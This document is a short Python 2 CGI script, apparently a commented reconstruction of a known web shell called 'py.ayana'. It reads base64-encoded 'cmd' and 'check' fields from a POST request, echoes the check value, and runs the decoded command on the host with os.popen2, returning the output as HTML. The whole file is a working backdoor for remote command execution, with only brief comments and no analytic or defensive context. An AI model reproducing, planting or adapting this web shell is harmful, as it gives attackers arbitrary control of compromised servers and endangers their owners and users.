#!/usr/bin/python
# ============================================================
# py.ayana
# - CGI handler (expects POST)
# - Decodes base64 'cmd' and 'check', prints 'check', runs decoded cmd
# - WARNING: executes remote input
# ============================================================

try:
    import cgitb
    cgitb.enable()
except Exception:
    # cgitb is optional — silently continue if unavailable
    pass

import os
import cgi
import base64

# Note: original code forced FieldStorage to assume POST via environ override
form = cgi.FieldStorage(environ={'REQUEST_METHOD': 'POST'})

cmd = form.getvalue('cmd')
check = form.getvalue('check')

# Print HTTP header (Python 2 style like original)
print "Content-type:text/html\r\n\r\n"

if cmd:
    # decode & print 'check' first
    try:
        check_decoded = base64.b64decode(check or "")
    except Exception:
        check_decoded = ""
    print check_decoded + "<pre>"

    # decode cmd and execute — original uses os.popen2
    try:
        decoded_cmd = base64.b64decode(cmd)
    except Exception:
        decoded_cmd = ""

    # Launch command, read output
    child_stdin, child_stdout = os.popen2(decoded_cmd)
    # close stdin (we don't send input)
    child_stdin.close()
    result = child_stdout.read()
    child_stdout.close()

    # print trimmed result and closing pre tag
    print result.strip()
    print "</pre>"
